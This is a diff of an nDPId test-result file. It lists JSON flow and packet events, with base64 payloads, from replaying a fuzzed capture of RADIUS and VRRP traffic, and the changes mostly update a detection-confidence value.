-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998013405,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998013338,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998013405,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1528998226495,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998226495,"pkt":"AAAMB6xAABRP+4rqCABFAALbITxAAP8RAAAKDFIexuIZNXIQBxQCxwAAAYoCv\/zOwB93ue+XnMHxJmANBSoaCgAAV8gOBFVTGgwAAFfIDQZ3aWZplw8AAFfICQlXSVNQUjEwGgkAADghDQMyNwZbIqlSATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NTIvZjA6N286NjA6ZDE6N2Q6M0EvMjOBBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCCQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3S3bmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCCSYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAv4VAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFg2kGwFBKmVAShzmsVPaY1NdsDR28hGUq6w=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998226700,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1528998226700,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998226700,"pkt":"AGRP+4rqcNuYVcUnCABFAADhCw9AAPwRSLvG4hk1CgxAQgcUchAAzUSUJQAAxU7iei8YAqXgQzF8ViRYUTYBNTAzMTE0ODAwNzM2UzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997839322,"flow_last_seen":1528998013405,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} -00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":140,"flow_first_seen":1528996068129,"flow_last_seen":1528998235241,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":62047,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997839322,"flow_last_seen":1528998013405,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":140,"flow_first_seen":1528996068129,"flow_last_seen":1528998235241,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":62047,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1528998235241,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998238764,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01328{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1528998238764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528998238764,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIUFAAP8RAABYDFAexuIZNXIQBxQClwAAAY8CjztV4Oh\/RVHKhHSmtgpLCVwaCgAAV8gODFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqleATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zMXBwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1bWE5Muo1YiwgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4BAasOgEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1PBgAAAAZRBDU2TwoCAAAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhLmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESj0ludmFszGQgVmFsdWUawgAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA5IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASxHIw401BJN8oimEroWhW+Q=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998238764,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998238764,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1528998257171,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998257171,"pkt":"AAAMB6xAABRP+4rqCABFAALbtPNAAP8RAAAKDEAexuIZPnIQBxQCxwAAAZQCv\/QjF2fWlNBdxlblaWkTeyMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1NwZbIqlxATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1YWE5MjI1YiwgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2bzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAlAEZjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGmwAAFfIEAROShoRAABXyE0LTHluZGh1cnN0GgwAAFfIEgYAAAjJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNjEaDAAAOCERBgAAAEIaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCFMFzQwLjgwNDg4Mk4tN3kuxzAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS4SWykyhQ3NEVyrk907GZpA=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1528998257238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998257238,"pkt":"ABRP+4rqcNuYVcUnCABFAAClC51AAPwRSGDG4hk+CgxAHgcUchAAkfysC5QAiW3tOcJvsUMExQ3khIQf5JsBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MAI6NWYvMjM4Tw4BAAAMFwwAAAwBf\/xQEttbuyUYSqflHrLDivPrVrc="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":276,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":663,"global_ts_msec":1528998257392} 